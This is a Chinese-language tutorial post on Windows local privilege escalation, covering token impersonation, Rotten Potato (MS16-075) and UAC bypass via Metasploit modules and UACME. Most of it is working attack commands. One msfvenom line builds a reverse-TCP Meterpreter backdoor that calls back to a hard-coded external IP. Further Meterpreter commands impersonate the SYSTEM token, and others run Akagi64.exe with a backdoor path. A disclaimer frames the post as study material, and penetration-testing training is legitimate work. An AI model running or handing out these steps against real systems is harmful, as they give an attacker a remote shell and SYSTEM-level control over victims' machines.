windows本地提权--令牌窃取烂土豆UAC

2024-04-23 20:28

本文主要是介绍windows本地提权--令牌窃取烂土豆UAC,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

免责声明:本文仅做技术交流与学习,请知法守法,不要乱搞破坏等等...

目录

一.令牌窃取

操作:

1-生成-->上传后门后,让msf上线

2-执行命令

二.烂土豆(MS16-075)

操作:

1-先让MSF上线

2-上传烂土豆

3-执行命令

三.UAC(用户账户控制)

1-MSF模块提权

2-UACME 项目(yyds)


本地--->system

一.令牌窃取

令牌窃取:  Win2008 Win2012

假冒令牌可以假冒一个网络中的另一个用户进行各类操作。

所以当一个攻击者需要域管理员的操作权限时候,需通过假冒域管理员的令牌进行攻击.

操作:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=39.105.154.133 LPORT=8888 -f exe -o msf.exe
getuid
use incognitolist_tokens -u	#展示令牌impersonate_token "NT AUTHORITY\SYSTEM"	#窃取令牌

1-生成-->上传后门后,让msf上线

2-执行命令


二.烂土豆(MS16-075)

---与令牌窃取差不多. 

操作:

1-先让MSF上线

2-上传烂土豆

3-执行命令

getuid       pwd        cd C://        //到烂土豆目录下.execute -cH -f ./potato.exe        //执行烂土豆use incognito        //窃取令牌模块list_tokens -u       //查看可以窃取权限impersonate_token "NT AUTHORITY\SYSTEM"    //窃取权限


三.UAC(用户账户控制)

快速定位命令: msconfig

为了远程执行目标的 exe 或者 bat 可执行文件绕过此安全机制,以此叫 BypassUAC .

绕过项目:MSF 内置,Powershell 渗透框架,UACME 项目(推荐).

开启 UAC 和 未开启 UAC 时,MSF 默认 getsystem 提权影响(进程注入).

1-MSF模块提权

----先让MSF上线.

msf先上线
getuid
getsystem		#遇到UAC就不行了.-->用模块search uacuac没开---getsystem直接成功uac开了	(win7)
use exploit/windows/local/bypassuac
--成功uac开了(默认状态)	(win10) 
上面的模块就不行了
use exploit/windows/local/ask
--这个模块需要靶机点击是才能成功.(条件苛刻)自动化:
use exploit/windows/local/bypassuac_sluihijack  
--成功use exploit/windows/local/bypassuac_silentcleanup  
--成功

2-UACME 项目(yyds)

GitHub - hfiref0x/UACME: Defeating Windows User Account Control

---该项目需要反编译一下,然后再上传运行.

--先让MSF上线 

#反编译之后--->上传Akagi64.exe-->命令执行Akagi64.exe 41 msf.exe	(前面为反编译好的软件,中间值为模式的选择,最后为后门路径)(76种)
Akagi64.exe 编号 调用执行
#原理:以UAC项目运行后门,进行绕过getuidgetsystem


这篇关于windows本地提权--令牌窃取烂土豆UAC的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


原文地址:
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.chinasem.cn/article/929795

相关文章

Windows环境下解决Matplotlib中文字体显示问题的详细教程

《Windows环境下解决Matplotlib中文字体显示问题的详细教程》本文详细介绍了在Windows下解决Matplotlib中文显示问题的方法,包括安装字体、更新缓存、配置文件设置及编码調整,并... 目录引言问题分析解决方案详解1. 检查系统已安装字体2. 手动添加中文字体(以SimHei为例)步骤

一文详解Git中分支本地和远程删除的方法

《一文详解Git中分支本地和远程删除的方法》在使用Git进行版本控制的过程中,我们会创建多个分支来进行不同功能的开发,这就容易涉及到如何正确地删除本地分支和远程分支,下面我们就来看看相关的实现方法吧... 目录技术背景实现步骤删除本地分支删除远程www.chinasem.cn分支同步删除信息到其他机器示例步骤

前端如何通过nginx访问本地端口

《前端如何通过nginx访问本地端口》:本文主要介绍前端如何通过nginx访问本地端口的问题,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录一、nginx安装1、下载(1)下载地址(2)系统选择(3)版本选择2、安装部署(1)解压(2)配置文件修改(3)启动(4)

基于Python开发Windows屏幕控制工具

《基于Python开发Windows屏幕控制工具》在数字化办公时代,屏幕管理已成为提升工作效率和保护眼睛健康的重要环节,本文将分享一个基于Python和PySide6开发的Windows屏幕控制工具,... 目录概述功能亮点界面展示实现步骤详解1. 环境准备2. 亮度控制模块3. 息屏功能实现4. 息屏时间

在Windows上使用qemu安装ubuntu24.04服务器的详细指南

《在Windows上使用qemu安装ubuntu24.04服务器的详细指南》本文介绍了在Windows上使用QEMU安装Ubuntu24.04的全流程:安装QEMU、准备ISO镜像、创建虚拟磁盘、配置... 目录1. 安装QEMU环境2. 准备Ubuntu 24.04镜像3. 启动QEMU安装Ubuntu4

Windows下C++使用SQLitede的操作过程

《Windows下C++使用SQLitede的操作过程》本文介绍了Windows下C++使用SQLite的安装配置、CppSQLite库封装优势、核心功能(如数据库连接、事务管理)、跨平台支持及性能优... 目录Windows下C++使用SQLite1、安装2、代码示例CppSQLite:C++轻松操作SQ

基于Python实现一个Windows Tree命令工具

《基于Python实现一个WindowsTree命令工具》今天想要在Windows平台的CMD命令终端窗口中使用像Linux下的tree命令,打印一下目录结构层级树,然而还真有tree命令,但是发现... 目录引言实现代码使用说明可用选项示例用法功能特点添加到环境变量方法一:创建批处理文件并添加到PATH1

Java使用HttpClient实现图片下载与本地保存功能

《Java使用HttpClient实现图片下载与本地保存功能》在当今数字化时代,网络资源的获取与处理已成为软件开发中的常见需求,其中,图片作为网络上最常见的资源之一,其下载与保存功能在许多应用场景中都... 目录引言一、Apache HttpClient简介二、技术栈与环境准备三、实现图片下载与保存功能1.

Windows的CMD窗口如何查看并杀死nginx进程

《Windows的CMD窗口如何查看并杀死nginx进程》:本文主要介绍Windows的CMD窗口如何查看并杀死nginx进程问题,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地... 目录Windows的CMD窗口查看并杀死nginx进程开启nginx查看nginx进程停止nginx服务

Windows 系统下 Nginx 的配置步骤详解

《Windows系统下Nginx的配置步骤详解》Nginx是一款功能强大的软件,在互联网领域有广泛应用,简单来说,它就像一个聪明的交通指挥员,能让网站运行得更高效、更稳定,:本文主要介绍W... 目录一、为什么要用 Nginx二、Windows 系统下 Nginx 的配置步骤1. 下载 Nginx2. 解压